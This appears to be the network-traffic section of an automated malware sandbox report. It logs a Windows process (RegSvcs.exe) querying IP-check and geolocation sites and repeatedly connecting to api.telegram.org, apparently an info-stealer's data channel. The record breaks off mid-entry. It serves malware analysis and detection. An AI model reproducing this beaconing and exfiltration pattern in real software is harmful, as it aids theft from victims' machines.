                                                                                                                  Jan 11, 2025 01:27:58.499219894 CET5540880192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:58.504460096 CET8055408193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:58.685503960 CET8055408193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:58.687796116 CET55420443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:58.687819004 CET44355420104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:58.687875986 CET55420443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:58.688175917 CET55420443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:58.688184977 CET44355420104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:58.731231928 CET5540880192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:59.169553995 CET44355420104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:59.172019005 CET55420443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:59.172044039 CET44355420104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:59.327836037 CET44355420104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:59.327891111 CET44355420104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:59.327930927 CET55420443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:59.328610897 CET55420443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:59.336785078 CET5540880192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:59.339382887 CET5542680192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:59.341711044 CET8055408193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:59.341770887 CET5540880192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:59.344152927 CET8055426193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:59.344213009 CET5542680192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:59.344325066 CET5542680192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:59.349081039 CET8055426193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:59.739092112 CET4970780192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:59.993185043 CET8055426193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:00.024843931 CET55431443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:00.024904966 CET44355431104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:00.024996996 CET55431443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:00.029208899 CET55431443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:00.029233932 CET44355431104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:00.045466900 CET5542680192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:00.184196949 CET55432443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:28:00.184292078 CET44355432149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:00.184395075 CET55432443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:28:00.184695959 CET55432443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:28:00.184726000 CET44355432149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:00.491883993 CET44355431104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:00.493554115 CET55431443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:00.493565083 CET44355431104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:00.629772902 CET44355431104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:00.629842043 CET44355431104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:00.629899979 CET55431443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:00.630399942 CET55431443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:00.635236979 CET5542680192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:00.636518955 CET5543880192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:00.640523911 CET8055426193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:00.640711069 CET5542680192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:00.641338110 CET8055438193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:00.642101049 CET5543880192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:00.647021055 CET5543880192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:00.652530909 CET8055438193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:00.799463987 CET44355432149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:00.809109926 CET55432443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:28:00.809124947 CET44355432149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:00.809247971 CET55432443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:28:00.809252977 CET44355432149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:01.050259113 CET44355432149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:01.050327063 CET44355432149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:01.050379038 CET55432443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:28:01.050898075 CET55432443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:28:01.276916027 CET8055438193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:01.278141022 CET55443443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:01.278155088 CET44355443104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:01.278204918 CET55443443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:01.278409958 CET55443443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:01.278419018 CET44355443104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:01.328649044 CET5543880192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:01.751080990 CET44355443104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:01.752675056 CET55443443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:01.752692938 CET44355443104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:01.903867006 CET44355443104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:01.903927088 CET44355443104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:01.903979063 CET55443443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:01.904556990 CET55443443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:01.907687902 CET5543880192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:01.908873081 CET5544680192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:01.913708925 CET8055438193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:01.913726091 CET8055446193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:01.913765907 CET5543880192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:01.913814068 CET5544680192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:01.913901091 CET5544680192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:01.920067072 CET8055446193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:02.579885006 CET8055446193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:02.602530003 CET55451443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:02.602580070 CET44355451104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:02.602673054 CET55451443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:02.603034019 CET55451443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:02.603055000 CET44355451104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:02.637495041 CET5544680192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:03.057126999 CET44355451104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:03.058981895 CET55451443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:03.058995962 CET44355451104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:03.207510948 CET44355451104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:03.207567930 CET44355451104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:03.207828045 CET55451443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:03.208272934 CET55451443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:03.212558031 CET5545780192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:03.217422009 CET8055457193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:03.217483997 CET5545780192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:03.217564106 CET5545780192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:03.222403049 CET8055457193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:03.861819983 CET8055457193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:03.865489960 CET55463443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:03.865525007 CET44355463104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:03.865627050 CET55463443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:03.865870953 CET55463443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:03.865880013 CET44355463104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:03.918850899 CET5545780192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:04.427181959 CET44355463104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:04.428646088 CET55463443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:04.428658009 CET44355463104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:04.585536003 CET44355463104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:04.585691929 CET44355463104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:04.585768938 CET55463443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:04.586203098 CET55463443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:04.589603901 CET5545780192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:04.590826035 CET5546980192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:04.595515966 CET8055457193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:04.595575094 CET5545780192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:04.596472979 CET8055469193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:04.599423885 CET5546980192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:04.599520922 CET5546980192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:04.604288101 CET8055469193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:05.243896961 CET8055469193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:05.245340109 CET55474443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:05.245383978 CET44355474104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:05.245444059 CET55474443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:05.245707035 CET55474443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:05.245721102 CET44355474104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:05.294015884 CET5546980192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:05.736140966 CET44355474104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:05.737778902 CET55474443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:05.737869024 CET44355474104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:05.898864031 CET44355474104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:05.899005890 CET44355474104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:05.899074078 CET55474443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:05.899462938 CET55474443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:05.902386904 CET5546980192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:05.903340101 CET5547980192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:05.907457113 CET8055469193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:05.907512903 CET5546980192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:05.908179998 CET8055479193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:05.911149979 CET5547980192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:05.911247015 CET5547980192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:05.916003942 CET8055479193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:06.551422119 CET8055479193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:06.552671909 CET55482443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:06.552706003 CET44355482104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:06.552782059 CET55482443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:06.553200960 CET55482443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:06.553219080 CET44355482104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:06.606267929 CET5547980192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:07.006575108 CET44355482104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:07.008419037 CET55482443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:07.008450031 CET44355482104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:07.130819082 CET44355482104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:07.130877972 CET44355482104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:07.130937099 CET55482443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:07.131329060 CET55482443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:07.136051893 CET5547980192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:07.136955976 CET5548880192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:07.141063929 CET8055479193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:07.141118050 CET5547980192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:07.141798973 CET8055488193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:07.141855001 CET5548880192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:07.141972065 CET5548880192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:07.146728039 CET8055488193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:07.777970076 CET8055488193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:07.779598951 CET55494443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:07.779647112 CET44355494104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:07.779752970 CET55494443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:07.780021906 CET55494443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:07.780033112 CET44355494104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:07.825077057 CET5548880192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:08.245094061 CET44355494104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:08.246861935 CET55494443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:08.246896982 CET44355494104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:08.393312931 CET44355494104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:08.393383026 CET44355494104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:08.393449068 CET55494443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:08.393933058 CET55494443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:08.402834892 CET5548880192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:08.403611898 CET55499443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:28:08.403650045 CET44355499149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:08.403719902 CET55499443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:28:08.404104948 CET55499443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:28:08.404115915 CET44355499149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:08.407804966 CET8055488193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:08.407859087 CET5548880192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:09.077140093 CET44355499149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:09.077225924 CET55499443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:28:09.078728914 CET55499443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:28:09.078752041 CET44355499149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:09.079029083 CET44355499149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:09.080495119 CET55499443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:28:09.127340078 CET44355499149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:09.331907988 CET44355499149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:09.331986904 CET44355499149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:09.332072973 CET55499443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:28:09.334522009 CET55499443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:28:14.558871031 CET5544680192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:14.684034109 CET55539443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:28:14.684076071 CET44355539149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:14.684544086 CET55539443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:28:14.684952974 CET55539443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:28:14.684962988 CET44355539149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:15.300740957 CET44355539149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:15.302458048 CET55539443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:28:15.302486897 CET44355539149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:15.302766085 CET55539443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:28:15.302772999 CET44355539149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:15.484710932 CET44355539149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:15.484798908 CET44355539149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:15.485131025 CET55539443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:28:15.485403061 CET55539443192.168.2.5149.154.167.220

                                                                                                                  UDP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Jan 11, 2025 01:27:41.622420073 CET4928753192.168.2.51.1.1.1
                                                                                                                  Jan 11, 2025 01:27:41.629883051 CET53492871.1.1.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:42.534759998 CET6368353192.168.2.51.1.1.1
                                                                                                                  Jan 11, 2025 01:27:42.541951895 CET53636831.1.1.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:53.584928989 CET6337053192.168.2.51.1.1.1
                                                                                                                  Jan 11, 2025 01:27:53.591856956 CET53633701.1.1.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:53.972352028 CET53603451.1.1.1192.168.2.5

                                                                                                                  DNS Queries

                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                  Jan 11, 2025 01:27:41.622420073 CET192.168.2.51.1.1.10xbdf0Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                  Jan 11, 2025 01:27:42.534759998 CET192.168.2.51.1.1.10x6f33Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                  Jan 11, 2025 01:27:53.584928989 CET192.168.2.51.1.1.10x95f8Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                  DNS Answers

                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                  Jan 11, 2025 01:27:41.629883051 CET1.1.1.1192.168.2.50xbdf0No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Jan 11, 2025 01:27:41.629883051 CET1.1.1.1192.168.2.50xbdf0No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                  Jan 11, 2025 01:27:41.629883051 CET1.1.1.1192.168.2.50xbdf0No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                  Jan 11, 2025 01:27:41.629883051 CET1.1.1.1192.168.2.50xbdf0No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                  Jan 11, 2025 01:27:41.629883051 CET1.1.1.1192.168.2.50xbdf0No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                  Jan 11, 2025 01:27:41.629883051 CET1.1.1.1192.168.2.50xbdf0No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                  Jan 11, 2025 01:27:42.541951895 CET1.1.1.1192.168.2.50x6f33No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                  Jan 11, 2025 01:27:42.541951895 CET1.1.1.1192.168.2.50x6f33No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                  Jan 11, 2025 01:27:42.541951895 CET1.1.1.1192.168.2.50x6f33No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                  Jan 11, 2025 01:27:42.541951895 CET1.1.1.1192.168.2.50x6f33No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                  Jan 11, 2025 01:27:42.541951895 CET1.1.1.1192.168.2.50x6f33No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                  Jan 11, 2025 01:27:42.541951895 CET1.1.1.1192.168.2.50x6f33No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                  Jan 11, 2025 01:27:42.541951895 CET1.1.1.1192.168.2.50x6f33No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                  Jan 11, 2025 01:27:53.591856956 CET1.1.1.1192.168.2.50x95f8No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                  HTTP Request Dependency Graph

                                                                                                                  • reallyfreegeoip.org
                                                                                                                  • api.telegram.org
                                                                                                                  • checkip.dyndns.org

                                                                                                                  HTTP Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.549704193.122.6.168802804C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 11, 2025 01:27:41.645015001 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 11, 2025 01:27:42.292053938 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:27:42 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                  Jan 11, 2025 01:27:42.297210932 CET127OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Jan 11, 2025 01:27:42.488945961 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:27:42 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                  Jan 11, 2025 01:27:43.211663008 CET127OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Jan 11, 2025 01:27:43.401844025 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:27:43 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.549707193.122.6.168802804C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 11, 2025 01:27:44.041424036 CET127OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Jan 11, 2025 01:27:44.668097973 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:27:44 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
